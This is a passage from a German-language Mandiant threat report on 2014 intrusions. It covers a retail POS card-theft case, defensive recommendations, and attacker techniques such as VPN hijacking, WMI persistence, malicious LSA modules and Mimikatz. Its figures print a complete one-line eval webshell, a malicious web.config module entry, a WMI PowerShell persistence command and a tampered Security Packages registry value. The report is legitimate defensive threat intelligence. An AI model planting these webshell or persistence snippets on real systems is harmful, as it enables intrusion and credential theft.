Abfrage an CnC-Server.
Mit XOR kodierter Shellcode wird
heruntergeladen und ausgeführt.
gehacktes
System
CnC-Server
des
Angreifers

12. 10 www.mandiant.com
Ein Bericht von der CyberfrontM-Trends
Alle POS-Terminals in
der gesamten Kauf-
hauskette nutzten
denselben Domänen-
controller für die
Authentifizierung.
Wer also Zugang zum
Domänencontroller
der Verkaufsdomäne
hatte, konnte direkt
auf alle POS-Terminals
zugreifen.
Er konzentrierte sich jedoch auf die Ver-
kaufsumgebung.
Diese Umgebung war wie folgt konfigu­
riert:
• Zwischen der Verkaufsdomäne und
der Zentraldomäne des Unterneh-
mens war ein Two-Way-Trust
konfiguriert.
• Auf den POS-Terminals lief Microsoft
Windows XP.
• Die POS-Terminals waren mit der
Verkaufsdomäne verbunden.
Diese im Einzelhandel weit verbreitete
Konfiguration hat zwei Schwachpunkte,
die der Angreifer ausnutzen konnte.
Erstens konnte er die zuvor erbeuteten
Anmeldedaten des Domänenadministra-
tors der Zentraldomäne nutzen, um privi­
legierten Zugriff auf die Verkaufsdomäne
zu erlangen.
Zweitens war die Verkaufsdomäne eine
untergeordnete Domäne der Zentraldo­
mäne. Manche Funktionen funktionierten
nur, wenn bestimmte wichtige Ports zwi­
schen der Zentral- und Verkaufsdomäne
offen blieben. Über diese offenen Ports
konnten jedoch alle Firewall-Kontrollen
der Kaufhauskette um­gangen werden.
Der Angreifer nutzte diese offenen Ports,
um auf den Domänencontroller zuzugrei­
fen und von dort in die Verkaufsdomäne
zu gelangen.
Alle POS-Terminals in der gesamten Kauf-
hauskette nutzten denselben Domänen-
controller für die Authentifizie­rung. Wer
also Zugang zum Domänencontroller der
Verkaufsdomäne hatte, konnte direkt auf
alle POS-Terminals zugreifen. Der Angrei­
fer nutzte eine Windows-Batchdatei auf
dem Domä­nencontroller der Verkaufsdo­
mäne, um alle POS-Terminals in der ge­
samten Kaufhauskette mit Malware zum
Stehlen von Kreditkartendaten zu infizie-
ren.
Der Angreifer führte die Malware als ge-
plante Windows-Aufgabe aus. Die auf den
POS-Terminals installierte Malware las die
auf dem Magnetstreifen der Kreditkarten
gespeicherten Kartennummern und das
Ablaufdatum sowie weitere Transaktions-
details aus dem Prozessspeicher der
POS-Anwendung aus und sammelte sie.
Angreifer können diese Daten an andere
Kriminelle verkaufen, die Kreditkarten
fälschen.
Zum Erfassen der Kreditkarten- und
Transaktionsdaten nutzte die Malware
OSQL, ein befehlszeilenbasiertes Tool für
SQL-Abfragen, das bereits auf den POS-
Terminals installiert war. Die gestohlenen
Daten wurden dann in einer temporären
MSSQL-Datenbank namens tempdb
gespeichert. Wenn MSSQL gestoppt wird,
werden alle Daten in tempdb automatisch
gelöscht. Einmal täglich startete der
Angreifer eine SQL-Abfrage, um die Daten
aus den tempdb aller POS-Terminals in
einer Textdatei auf dem Domänencontrol­
ler zu speichern.
Dort archivierte er die Textdatei und
schickte sie an eine mit dem Internet ver­
bundene Workstation in der Verkaufsdo­
mäne. Von dieser Workstation aus konnte
er die archivierte Datei mit den gestohle­
nen Daten per FTP an einen von ihm kon­
trollierten Server schicken.
Abbildung 3 stellt den Verlauf des Angriffs
grafisch dar.

13. www.mandiant.com 11
Abbildung 3: Verlauf des Angriffs
Der Angreifer bricht aus der virtualisierten
Anwendungsumgebung aus und erkundet das
Unternehmensnetzwerk. Dort erbeutet er
Anmeldedaten für weitere Systeme.
2 Der Angreifer nutzt den Domänencontroller
der Verkaufsdomäne, um auf die POS-Termi-
nals zuzugreifen und sie mit Malware zum
Stehlen von Kreditkarten- und Transaktions-
daten zu infizieren.
3
Der Angreifer meldet sich mit gültigen Anmeldedaten per
Fernzugriff an einem Server des Opfers an, auf dem eine
virtualisierte Anwendung läuft.
1 Der Angreifer überträgt die
gestohlenen Daten von den
POS-Terminals über den
Domänencontroller der
Verkaufsdomäne auf eine
Benutzer-Workstation in
derselben Domäne. Von dort
überträgt er sie mit FTP auf
einen externen Server.
4
virtueller
Anwendungs-
server
Haupt-
domänen-
controller
Domänencon-
troller der
Verkaufs-
domäne
Benutzer-
Workstation
erster Zugriff Ausschleusen der Daten via FTP
Benutzer-
Workstation
POS-Ter-
minal 1
POS-Ter-
minal 2
Laden 2
VerkaufsdomäneZentraldomäne
DMZ
POS-Ter-
minal1
POS-Ter-
minal 2
Laden 1
Kommunika-
tion mit dem
CnC-Server
Angreifer

14. 12 www.mandiant.com
Ein Bericht von der CyberfrontM-Trends
Fazit : Wo Geld ist, sind auch Kriminelle nicht weit. Einzelhändler gehören schon
seit Langem zu den bevorzugten Zielen von Internetkriminellen. Daran hat sich auch
2014 nichts geändert. Die Angreifer nutzten zwar einige neue Angriffsma­schen und
das Medieninteresse an ihren Aktivitäten stieg, doch ihr „Modus Operandi“ hat sich
im Vergleich zu den Vorjahren nicht grundlegend geändert.
Empfehlungen
Der in der Fallstudie beschriebene Angriff wäre so in Europa nicht möglich, doch auch hier rollt eine regel-
rechte Lawine von Angriffen auf Online-Händler und andere Unternehmen zu, die Online-Transaktionen
abwickeln. Sie können nicht jeden Angriff abwehren, doch die folgenden Maßnahmen erschweren es An-
greifern, in Ihre Umgebung einzudringen und diese auszuspionieren. Mit den richtigen Tools und einem
wachsamen Sicherheitsteam können Sie den Verlauf eines Angriffs verlangsa­men. Dadurch gewinnen Sie
Zeit, um den Angriff aufzudecken, zu untersuchen und zu reagieren, bevor der Angreifer sein Ziel erreicht
hat.
Sicherer Fernzugriff
Analysieren Sie, mit welchen Methoden Ihre
Angestellten, externe Mitarbeiter und Zuliefe­
rer per Fernzugriff auf Ihre Infrastruktur zu-
greifen. Bemühen Sie sich, die Anzahl der ver-
fügbaren Zugriffsmethoden, die Anzahl der
autori­sierten Nutzer und alle anderen Aspekte
des Fernzugriffs auf ein kontrollierbares Maß
einzuschränken. Legen Sie Richtlinien für starke
Kennwörter fest und stellen Sie alle Zugriffs-
methoden auf Zwei-Faktor-Authentifizierung
um. Durchsuchen Sie die Logdateien für den
Fernzugriff kontinuierlich nach Anzeichen ver­
dächtiger Aktivitäten.
Sicherer Zugang zur PCI-
DSS-Umgebung
Schotten Sie Ihre Umgebung für Zahlungen ge­
mäß dem Payment Card Industry Data Security
Standard (PCI DSS) vom Rest Ihres Intranets
ab. Der Zugang zu Systemen in der PCI-DSS-
Umgebung sollte nur über einen von einem
siche­ren Jumpserver kontrollierten Tunnel
möglich sein. Damit befinden sich Ihre POS-
Terminals effektiv in einem Hochsicherheits-
bereich. Der Zugriff auf den Jumpserver sollte
mit Zwei-Faktor-Authentifzierung gesichert
sein.
Trennen Sie die Verkaufsdomäne nach Möglich-
keit vom Rest des Intranets ab, um die Anzahl
der möglichen Einfallstore für diese Domäne zu
minimieren. Als zusätzliche Sicherheitsmaß­
nahme sollte der Aufbau von Netzwerkverbin­
dungen aus der Verkaufsdomäne auf Verbindun­
gen zu einer genehmigten Liste geprüfter IP-
Adressen beschränkt werden, die für den
Geschäftsablauf erforderlich sind.
Whitelist von Anwendungen
für kritische Ressourcen
Um das Risiko einer Malware-Infektion sicher-
heitskritischer Systeme zu minimieren, sollten
auf diesen Systemen nur Anwendungen ausge­
führt werden dürfen, die sich auf einer Whitelist
geprüfter und genehmigter Anwendungen be-
finden. Als sicherheitskritisch sollten alle Jump-
server, Domänencontroller und sämtliche Syste­
me gelten, auf denen Kreditkartendaten verar-
beitet werden.
Management privilegierter
Konten
Privilegierte Konten sind für Angreifer beson-
ders interessant, darunter das des Systemad-
ministrators und des Domänenadministrators
sowie Dienstkonten. Halten Sie die Anzahl pri­
vilegierter Konten so niedrig wie möglich. Sor-
gen Sie dafür, dass die Systemadministrator­
konten für verschiedene Systeme unterschied­
liche Kennwörter haben. Erwägen Sie den Ein-
satz einer Kennwortverwaltung zur Unterstüt­
zung Ihrer Systemadministratoren bei der Ver-
waltung zahlreicher verschiedener Kennwörter.
Manche dieser Tools können Kennwörter auto­
matisch nach jeder Nutzung ändern, um das
Knacken privilegierter Konten zusätzlich zu er-
schweren.

15. www.mandiant.com 13
E
s ist eine Art Wettrüsten: Sicherheitsteams
implementieren neue Sicherheitsmaßnah­
men und Angreifer finden Wege, um diese
Maßnahmen zu umgehen. Das blieb auch 2014 so.
Wir untersuchten mehr Vorfälle, bei denen Angrei­
fer das VPN des Opfers hackten, um sich dauer­
haften Zugang zu seiner Infrastruktur zu verschaf-
fen. Zudem beobachteten wir clevere neue Tricks,
um unentdeckt zu bleiben, sowie neue Tools und
Methoden zum Stehlen von Anmeldedaten und
Ausspionieren gehackter Umgebungen.
Hacken von VPN
Ein Hacker, der sich Zugriff auf das VPN seines
Opfers verschaffen kann, hat zwei große Vorteile.
Erstens hat er dadurch dauerhaft Zugang zur ge-
hackten Infrastruktur, ohne Backdoors einrichten
zu müssen. Zweitens kann er privile­gierte Nutzer
nachahmen, um unauffällig zu bleiben.
Wir hatten bereits in früheren Jahren beobach-
tet, dass manche Angreifergruppen gezielt VPN-
Ressourcen und -Anmeldedaten ins Visier nehmen,
sobald sie in ein Netzwerk eingedrungen sind. Doch
2014 wurde ein neuer Rekord gesetzt: Wir sahen
mehr Fälle, in denen Angreifer Zugang zum VPN
ihres Opfer erlangten, als je zuvor.
Bei den meisten dieser Angriffe wurde eine der fol-
genden beiden Methoden genutzt:
• Ein-Faktor-Authentifizierung: Wo nur ein
Benutzername und Kennwort erforderlich
waren, um auf das VPN zuzugreifen, nutzten
die Angreifer Anmeldedaten, die sie von einem
gehackten Computer oder der gehackten
Active-Directory-Domain gestohlen hatten.
• Zertifikatsbasierte Zwei-Faktor-Authenti­
fizierung: Wo das VPN des Opfers ein
benutzerspezifisches digitales Zertifikat als
zweiten Authentifizierungsfaktor verlangte,
nutzten Angreifer gängige Tools wie Mimikatz,
Trend Nr. 3:
Raffiniertere Angriffsabläufe
Die meisten von uns untersuchten Vorfälle folgen demselben Schema. Wir nennen
dies den Lebenszyklus eines Angriffs.
um diese Zertifikate von gehackten Benutzer-
computern zu extrahieren. In einigen Fällen
gelang es den Angreifern auch, VPN-Zertifika­
te abzufangen, die über unsichere Kommuni­
kationskanäle an ihre legitimen Eigentümer
geschickt wurden, beispielsweise als Anhang
einer unver­schlüsselten E-Mail oder über eine
offene Netzwerkfreigabe.
In seltenen Fällen nutzten Angreifer Methoden,
mit denen die VPN-Authentifizierung komplett
umgangen werden konnte. Ein solches Beispiel war
„Heartbleed“, eine Schwachstelle in der Erweite­
rung Heartbeat des Protokolls Transport Layer Se-
curity (TLS), die im April 2014 Schlagzeilen machte.
Angreifer konnten betroffene Systeme und Geräte
dazu bringen, bei jeder Abfrage bis zu 64 Kilobyte
Daten aus dem Systemspeicher preiszugeben.
Forscher bezweifelten zunächst, dass mit dieser
Methode tatsächlich sensible Daten wie Verschlüs-
selungsschlüssel oder Anmeldedaten von echten
Systemen gestohlen werden konnten.
Die schlimmsten Befürchtungen erwiesen sich je­
doch als zutreffend. Wenige Wochen nach Bekannt­
werden von Heartbleed untersuchten wir einen
Fall, in dem der Angreifer diese Schwachstelle in ei-
nem VPN-Gerät ausnutzte, um die authentifizierten
Sitzungen autorisierter Nutzer zu übernehmen und
sich – völlig ohne Anmeldedaten – Zugang zum VPN
zu verschaffen. In den folgenden Wochen nutzten
Angreifer Heartbleed, um in die VPN-Infrastruktu­
ren weiterer Opfer einzudringen.
Bessere Tarnung für Malware
Die Malwareerkennung ist mit einem ständigen
Wettrüsten zwischen Angreifern und Verteidigern
vergleichbar. Das bestätigte sich auch 2014 wieder.
Angreifer fanden mehrere neue Methoden, um ihre
Aktionen zu verschleiern und Malware auf infizier-
ten Systemen zu verbergen.

16. 14 www.mandiant.com
Ein Bericht von der CyberfrontM-Trends
Bessere Verstecke für Webshells
Webbasierte Backdoors, die sogenannten Web-
shells, sind ein mindestens zehn Jahre alter Mal-
waretyp. Dank neuer Methoden bleiben sie bei
netzwerk- und hostbasierten Malwarescans unent-
deckt und gehören weiterhin zu den bevorzugten
Tools für gezielte Angriffe.
In mehreren von uns untersuchten Fällen hatten
Angreifer ihre Webshell auf einem Server mit SSL-
Verschlüsselung (Secure Socket Layer) installiert.
Dadurch wurden alle mit der Backdoor ausge­
tauschten Daten mit dem privaten Schlüssel des
Servers verschlüsselt. Da die Opfer ihre Netzwerk-
architektur so konfiguriert hatten, dass ihre Sicher-
heitstools mit SSL verschlüsselte Daten nicht unter-
suchen konnten, wurden die Aktivitäten des Angrei­
fers nicht erkannt.
Wir gehen davon aus, dass diese Angriffsform in
Zukunft häufiger genutzt werden wird, da die SSL-
Verschlüsselung in immer mehr Unternehmen auf
alle öffentlich zugänglichen Bereiche der Website
ausgedehnt wird.
Abbildung 4: Neue Angriffsmethoden, die Mandiant bei Untersuchungen beobachtete
Eindringen Fuß fassen Privilegien
ausweiten
Umgebung
ausspionieren
Ziel erreicht
weitere Systeme
infizieren
unent-
deckt bleiben
Hacken von VPN
Mandiant beobachtete 2014 eine
Rekordzahl von Fällen, in denen
Angreifer sich Zugang zum VPN
ihres Opfers verschafften. Schädliche Sicherheitspakete
Angreifer nutzten die Windows
Security Package Extensibility aus, um
Backdoors und Kennwortlogger zu
installieren.
Verstecken von Webshells
Angreifer fanden auch 2014 wieder neue
Maschen zum Einschleusen und Verstecken
webbasierter Malware. Unter den von Mandiant
beobachteten Methoden waren:
• Installieren schädlicher Shells auf Servern mit
SSL-Verschlüsselung, um die Netzwerküber-
wachung zu umgehen,
• Einbetten einer einzigen Shellcode-Zeile mit
dem Kommando „eval“ in eine seriöse
Website,
• Ändern von Serverkonfigurationsdateien zum
Laden schädlicher DLLs.
Einsatz von WMI und Power-
Shell
Angreifer nutzen zunehmend WMI
und PowerShell, zwei leistungs-
starke Windows-Komponenten,
um dauerhaft Zugang zu einer
Infrastruktur zu erhalten, diese
auszuspionieren und Daten zu
stehlen.
Kerberos-Angriffe
Nachdem sie sich die Zugriffsrechte eines Domänenadminis-
trators verschafft hatten, konnten Angreifer sich mit dem
sogenannten „Kerberos Golden Ticket“ Zugang zu beliebigen
anderen privilegierten Konten verschaffen – selbst nachdem
alle Kennwörter in der Domäne geändert worden waren.
Unverschlüsselte Kennwörter
Angreifer nutzten neu kompilierte
Varianten des Tools Mimikatz, um
unverschlüsselte Kennwörter aus dem
Arbeitsspeicher zu stehlen, ohne von
Antivirensoftware entdeckt zu werden.
Wenn Schutzmaßnahmen weiter-
entwickelt werden, passen Angrei-
fer sich an und finden neue
Angriffsmethoden. Im Jahr 2014
beobachteten wir auf jeder Etappe
des Angriffs-Lebenszyklus neue
Methoden. Im Folgenden stellen
wir einige der Ergebnisse vor.
In einer anderen von uns beobachteten Angriffs-
form wurde eine Shell in eine Webseite des Ziel­
unternehmens eingeschleust. Diese Shell enthielt
das Kommando „eval“, das per HTTP-Abfrage über-
mittelten Shellcode ausführt und damit hervorra-
gend als Backdoor geeignet ist. Der Code für eine
Shell mit dem Kommando „eval“ kann weniger als
100 Byte lang sein und lässt sich daher leicht in ei­
ner größeren HTML-Datei verstecken.
Auf normale HTTP-Abfragen reagiert die gehackte
Webseite weiterhin wie zuvor. Doch wenn ein An-
greifer die Seite mit dem richtigen Parameter auf­
ruft, führt das Kommando „eval“ den übermittelten
schädlichen Code aus.
Abbildung 5 zeigt den Code für eine Shell mit dem
Kommando „eval“. Dies ist eine vollständige Shell,
die so in einer eigenen Webseite implementiert
oder in eine andere Website eingebettet werden
könnte. Der Angreifer würde seinen schädlichen
Code als Parameter p1 der HTTP-Abfrage übermit-
teln.

17. www.mandiant.com 15
In vergangenen Jahren hatten wir nur wenige WMI-
basierte Angriffe beobachtet. Das lag vermutlich
daran, dass die Nutzung von WMI recht kompliziert
ist und den meisten Angreifern einfachere Metho-
den ausreichten, um in einer gehackten Umgebung
unentdeckt zu bleiben. Im Jahr 2014 beobachteten
wir jedoch mehrere Angreifergruppen, die WMI für
diesen Zweck einsetzten.
Für die von uns beobachtete Methode erstellten die
Angreifer drei WMI-Objekte, in der Regel mit
PowerShell:
• Ereignisfilter: Der Filter ermittelt, ob ein
bestimmtes, häufig auftretendes Ereignis
eingetreten ist, beispielsweise eine bestimmte
Tageszeit oder der Ablauf einer vorgegebenen
Anzahl von Sekunden seit dem letzten
Systemstart.
• Ereignisempfänger: Der Empfänger führt ein
bestimmtes Skript bzw. einen bestimmten
Befehl aus, wenn das Ereignis eintritt. Die
meisten der von uns beobachteten Angreifer
erstellten befehlszeilenbasierte Ereignisemp-
fänger, die beliebige Befehle und Argumente
ausführen konnten, oder auf Active Script
basierende Ereignisempfänger, die VBS-
Skripte ausführten.
• Verbindung zwischen Filter und Empfänger:
Die Verbindung sorgt dafür, dass ein bestimm­
ter Empfänger aufgerufen wird, wenn das in
einem Filter spezifizierte Ereignis eintritt.
Abbildung 8 zeigt ein Beispiel für einen PowerShell-
Befehl, der einen befehlszeilenbasierten Ereignis-
empfänger erstellt. Dieser Empfänger führt power-
shell.exe mit einem in Base64-codierten String als
Argument aus.
Abbildung 5: Beispiel einer Webshell mit „eval“
<%@ Page Language=”Jscript”%><%eval(Request.Item[“p1”],”unsafe”);%>
Abbildung 6: Auszug aus der gehackten Datei web.config
<!--HTTP Modules -->
<modules>
<add type=”Microsoft.Exchange.Clients.BadModule” name=”BadModule” />
</modules>
Als letztes Beispiel in diesem Abschnitt möchten
wir Sie auf eine besonders raffinierte Masche für
die webbasierte Übertragung von Malware auf-
merksam machen: Die Angreifer änderten die Kon-
figurationsdatei web.config der Microsoft Internet
Information Services (IIS) auf einem Webserver.
Das veranlasste den Server, ein schädliches HTTP-
Modul zu laden. Abbildung 6 zeigt eine editierte
Version der Änderung in web.config.
Mit dieser Änderung wird der Server angewiesen,
die Bibliothek BadModule.dll aus einem Shared
Modules Directory zu laden und zur Bearbeitung
aller folgenden Webabfragen zu nutzen. Die Mal-
ware scannte und speicherte die Inhalte aller an
den Server gerichteten Webabfragen, einschließ­
lich aller von Benutzern übermittelten Anmeldeda­
ten. Das in Abbildung 6 gezeigte Beispiel wurde von
uns geändert. Der Angreifer gab dem schädlichen
Modul den Namen einer echten Microsoft-DLL und
änderte den Zeitstempel der Malware und der Kon-
figurationsdatei, um seine Spuren zu verwischen.
Dauerhafter Zugang mit WMI
Die Windows-Verwaltungsinstrumentation (Win-
dows Management Instrumentation, WMI), eine
Kernkomponente des Betriebssystems Windows,
enthält ein breites Spektrum an Funktionen und
Benutzer­oberflächen für die Systemverwaltung.
Anwendungen und Skriptsprachen wie PowerShell
und VBScript können die WMI nutzen, um Daten zu
erfassen, auf Komponenten auf den unteren Ebe­
nen des Betriebssystems zuzugreifen und Befehle
auszuführen. Darüber hinaus enthält die WMI ein
Ereignisframework, das die Ausführung einer vom
Benutzer angegebenen Anwendung veranlassen
kann, wenn der Status eines bestimmten Objekts
sich ändert. Anstelle einer seriösen Anwendung
ließen die von uns beobachteten Angreifer Malware
ausführen.

18. 16 www.mandiant.com
Ein Bericht von der CyberfrontM-Trends
Abbildung 7: So verschafften Angreifer sich mit WMI dauerhaften Zugriff
WMI testet regelmäßig, ob das im Ereignisfilter spezifizierte Ereignis eingetreten ist. In
diesem Beispiel wird die Bedingung täglich um 8.05 Uhr erfüllt.2
Wenn das im Filter spezifizierte Ereignis eintritt, ruft WMI automatisch den mit diesem
Filter verbundenen Ereignisempfänger auf. Das Beispiel zeigt einen Teil eines befehls-
zeilenbasierten Ereignisempfängers, der PowerShell mit zusätzlicher Malware ausführt,
die vom Angreifer als Base64-codierter Parameter bereitgestellt wird.
3
Mit PowerShell-Befehlen erstellt der Angreifer drei Ereignisobjekte in WMI: einen Empfänger,
der einen Befehl oder ein Skript ausführt, einen Filter, der das System auf eine häufig auftre-
tende Situation überprüft, und eine Verbindung zwischen dem Filter und dem Empfänger.
1
WMI-Namespace (rootsubscription)
Ereignisempfänger
„Führe dieses Skript/
diesen Befehl aus …“
Ereignisfilter
„Frage nach, ob
dieses Ereignis
eingetreten ist …“
Verbindung zwischen Filter und Empfänger
„Nutze diesen Filter, um den Empfänger
aufzurufen.“
Set-WmiInstance
SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE
TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour
= 08 AND TargetInstance.Minute = 05 GROUP WITHIN 60
CommandLineTemplate="C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe
–NonInteractive –enc SQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAALQBDAG8AbQBwAHUAdABl..."

19. www.mandiant.com 17
Der String könnte zusätzlichen PowerShell-Code
enthalten, beispielsweise ein einfaches Download-
Tool oder eine Backdoor, und den Angreifern so das
Installieren einer Skriptdatei auf der Festplatte er-
sparen. Wenn dieser Empfänger mit einem geeig­
neten Ereignisfilter verbunden wäre, könnte er wie-
derholt ausgeführt werden.
WMI-basierte Methoden für den langfristigen Zu-
griff auf eine gehackte Infrastruktur sind bei einer
forensischen Analyse nur schwer zu erkennen, da
die Angreifer Ereignisfilter und -empfänger auf
eine­m System definieren und diese mithilfe von
PowerShell-Befehlen auf demselben oder einem
anderen System ausführen können. Im Gegensatz
zu vielen anderen Methoden für den Erhalt eines
dauerhaften Zugriffs hinterlässt dies auch keine
Spuren in der Registry.
Die Objekte befinden sich im WMI-Repository ob-
jects.data, einer komplexen Datenbank auf der Fest-
platte, die sich nicht leicht auf schädliche Objekte
durchsuchen lässt. Darüber hinaus überprüft Win-
dows neu erstellte oder aktivierte Ereignisfilter und
-empfänger nur, wenn die Protokollierung auf der
Debug-Ebene aktiviert ist. Dabei wird jedoch eine
so hohe Anzahl von Ereignissen aufgezeichnet, dass
dies nicht die Standardoption ist und die langfristi­
ge Nutzung nicht empfohlen wird.5
Schädliche Sicherheitsmodule
Wir haben mehrere Fälle untersucht, in denen An-
greifer Sicherheitsmodule in der lokalen Sicherheits­
autorität (Windows Local Security Authority, LSA)
ausnutzten, um automatisch und unbemerkt Mal-
ware herunterzuladen. Sicher­heitsmodule sind
DLL-Dateien, die unter ver­schiedenen Werten un-
ter dem Registrierungs­schlüssel HKLMSYSTEM
CurrentControlSetControlLsa konfiguriert und beim
Systemstart von der LSA geladen werden. Jeder
dieser Werte enthält eine Liste von Dateinamen
(ohne die Dateierweiterung), die von %SYSTEM-
ROOT%system32 zu laden sind.
Da LSA-Module automatisch von LSASS.EXE gela­
den werden, kann ein Angreifer mit Administrator-
rechten diese Liste erweitern oder ändern, um bei
jedem Systemstart schädliche DLLs zu laden. In ei-
nem von uns 2014 untersuchten Fall änderte der
Angreifer den Wert von Security Packages, um si-
cherzustellen, dass das zum Herunterladen genutz-
te Tool der aus mehreren Komponenten bestehen-
den Backdoor tspkgEx.dll auf dem System verblieb.6
Abbildung 9 zeigt den geänderten Wert.
Diese Änderung veranlasst LSASS.EXE, bei jedem
Systemstart C:WINDOWSsystem32tspkgEx.dll zu
laden.
5
Auf der Mandiant-Konferenz MIRcon 2014 wurden Vorträge zu den Themen WMI und PowerShell gehalten, die diese Methoden ausführlicher be­
schrieben. Die Vorträge enthielten Fallstudien und Ratschläge für das Aufdecken und die forensische Analyse. Die Präsentationen sind unter https://dl.
mandiant.com/EE/library/MIRcon2014/MIRcon_2014_IR_Track_There%27s_Something_About_WMI.pdf und https://dl.mandiant.com/EE/library/MIR-
con2014/MIRcon_2014_IR_Track_Investigating_Powershell_Attacks.pdf verfügbar.
6
DLL-Name von uns geändert.
Abbildung 8: Auszug aus einem PowerShell-Befehl zum Erstellen eines WMI-Empfängers
Set-WmiInstance -Namespace “rootsubscription” -Class ‘CommandLineEventConsum-
er’ -Arguments @{ name=’EvilWMI’;CommandLineTemplate=”C:WINDOWSSystem32Win-
dowsPowerShellv1.0powershell.exe –enc SQBuAHYAbwBrAGUALQBDAG8AG8A-
bQ...<SNIP>”;RunInteractively=’false’}
Abbildung 9: Geänderte HKLMSYSTEMCurrentControlSetControlLsaSecurity Packages, die Malware lädt
SECURITY PACKAGES (unverändert): kerberos msv1_0 schannel wdigest tspkg pku2u
SECURITY PACKAGES (geändert): kerberos msv1_0 schannel wdigest tspkg pku2u
tspkgEx

20. 18 www.mandiant.com
Ein Bericht von der CyberfrontM-Trends
Da LSA erweiterbar ist, kann es auch um speziell
erstell­te Module erweitert werden, die beim Login
die Anmeldedaten des Benutzers über­prüfen. Ein
schädliches „Sicherheitsmodul“ kann diese Funktion
missbrauchen, um bei Anmeldeversuchen unver-
schlüsselte Kennwörter abzufangen.
Wir untersuchten 2014 einen gezielten Angriff, bei
dem der Angreifer Malware für genau diesen Zweck
als „Sicherheitsmodul“ lud. Das weit verbreitete
Toolkit Mimikatz7
enthält ebenfalls ein „Sicherheits-
modul“ zum Stehlen von Kennwörtern, mimilib.ssp.8
Tools und Tricks für den Kennwort-
diebstahl
Tools zum Stehlen von Anmeldedaten sind auf dem
Schwarzmarkt inzwischen so weit verbreitet, dass
das Entwenden von Kennwörtern und das Erlangen
von Zugriffsrechten in Windows-Umgebungen
deutlich einfacher sind als früher. Bei gezielten An-
griffen kam 2014 meist eine der beiden folgenden
Methoden zum Einsatz:
• „Pass the Hash“, also die Anmeldung mit einem
gestohlenen NTLM-Hashwert, ohne diesen zu
knacken,
• Stehlen unverschlüsselter Kennwörter aus
dem Arbeitsspeicher mit Mimikatz.
In Windows Server 2012 R2 und Windows 8.1 hat
Microsoft die Wirksamkeit dieser Methoden einge­
schränkt, völlig unmöglich sind sie dadurch jedoch
noch immer nicht. Die meisten Kunden, mit denen
wir im vergangenen Jahr zusammenarbeiteten,
nutzten außerdem noch Domänen mit Windows
Server 2008 und Endpunkte mit Windows 7. „Pass
the Hash“ ist daher eine bewährte und weiterhin
erfolg­versprechende Methode, insbesondere wenn
mehrere Systeme in einer Umgebung dasselbe Ad-
ministratorkennwort haben.
Mimikatz geht einen Schritt weiter: Es stiehlt un-
verschlüsselte Windows-Kennwörter, die vom Sys-
tem im Arbeitsspeicher abgelegt wurden, um ver-
schiedene Formen von Single-Sign-On zu unter-
stützen.
Auf dem Computer eines Mitarbeiters sind die Aus-
wirkungen eines solchen Angriffs wahrscheinlich
auf den Diebstahl des Domänenkennworts dieses
Mitarbeiters begrenzt. Auf einem gemein­sam ge-
nutzten Server, auf dem viele Benutzer sich mit
dem Remote Desktop Protocol (RDP), dem Tool
PsExec oder anderen Methoden interaktiv anmel­
den, könnten dagegen potenziell sehr viele Kenn­
wörter gestohlen werden. Die Opfer eines solchen
Angriffs sind meist überrascht, wie schnell ein An-
greifer eine ganze Domäne in Active Directory un-
ter seine Kontrolle bringen kann, nachdem er sich
Zugang zu einigen wenigen Systemen verschafft
hat.
In fast allen von uns untersuchten Fällen wurde
Mimikatz von der Antivirensoftware des Opfers
weder erkannt noch abgewehrt, obwohl dieses Tool
weit verbreitet und sehr bekannt ist. Die meisten
Angreifer änderten den Quellcode leicht oder kom­
pilierten ihn einfach nur neu, um Antivirensoftware
zu umgehen. Manche nutzten auch Variationen wie
das PowerShell-Skript „Invoke-Mimikatz“, das voll-
ständig im Arbeitsspeicher ausgeführt werden
kann.
Außerdem beobachteten wir 2014 mehrere neue
Angriffsmethoden, die auf den Authentifizierungs-
mechanismus Kerberos abzielten, der in modernen
Windows-Domänen standardmäßig verwendet
wird. Die Mimikatz-Masche „Golden Ticket“ ist viel-
leicht die gefährlichste und berüchtigtste dieser
Methoden. Mit ihr kann ein Angreifer, der einen
Domänencontroller gehackt hat, ein Kerberos-
Ticket erstellen, das das Zuweisen beliebiger Zu-
griffsrechte an andere Benutzer erlaubt.
In fast allen von uns untersuchten Fällen wurde Mimikatz von der Anti-
virensoftware des Opfers weder erkannt noch abgewehrt, obwohl dieses
Tool weit verbreitet und sehr bekannt ist. Die meisten Angreifer änderten
den Quellcode leicht oder kompilierten ihn einfach nur neu, um Antiviren-
software zu umgehen.
7
https://github.com/gentilkiwi/mimikatz5
8
Auf der Mandiant-Konferenz MIRcon 2014 präsentierte Matt Graeber weitere Untersuchungsergebnisse zu schädlichen Sicherheitsmodulen sowie
Hinweise zu deren Aufdeckung und Abwehr. Diese Präsentation ist unter https://dl.mandiant.com/EE/library/MIRcon2014/MIRcon_2014_IR_Track_
Analysis_of_Malicious_SSP.pdf verfügbar.

21. www.mandiant.com 19
Dieses sogenannte „goldene Ticket“ kann offline
erstellt werden und eine unbegrenzte Gültigkeits-
dauer haben. Mit einem solchen Ticket kann der
Angreifer auf jedes Konto in der Domäne zugreifen,
auch nachdem das entsprechende Kennwort geändert
wurde. Ein Angreifer mit einem „goldenen Ticket“
kann also erneut in eine einmal gehackte Umge-
bung eindringen und sich sofort wieder Administra-
torprivilegien verschaffen, selbst nachdem der
ursprüng­liche Angriff abgewehrt, alle Kennwörter
geändert und die vom Hacker vorgenommenen
Änderungen rückgängig gemacht wurden.
Um ein System nach einem Angriff mit einem „gol­
denen Ticket“ erneut zu sichern, muss das Kenn­
wort für das Servicekonto krbtgt zweimal hinter­
einander geändert werden. Dieses Konto wird in
Kerberos für die Authentifizierung und Schlüssel­
verteilung verwendet. Beim zweimaligen Ändern
des Kennworts werden die Kennwort-Historie des
Kontos gelöscht und alle vorhandenen Kerberos-
Tickets annulliert.
Navigation mit WMI und PowerShell
In der Vergangenheit mussten Angreifer eine Kom-
bination aus Windows-Funktionen wie net und at,
speziell erstellter Malware, Batchdateien oder VBS-
Skripte und Administratortools wie PsExec nutzen,
um eine Windows-Umgebung auszuspio­nieren und
dort Befehle auszuführen. Diese Methoden waren
bewährt und bequem, hinterließen jedoch Spuren,
die bei einer forensischen Analyse ausgewertet
werden konnten.
In den Jahren 2013 und 2014 stiegen mehrere der
von uns beobachteten APT-Gruppen auf völlig neue
Navigationsmethoden um. Diese Gruppen nutzen
nun häufiger WMI und PowerShell, um Windows-
Umgebungen auszuspionieren, Anmel­dedaten zu
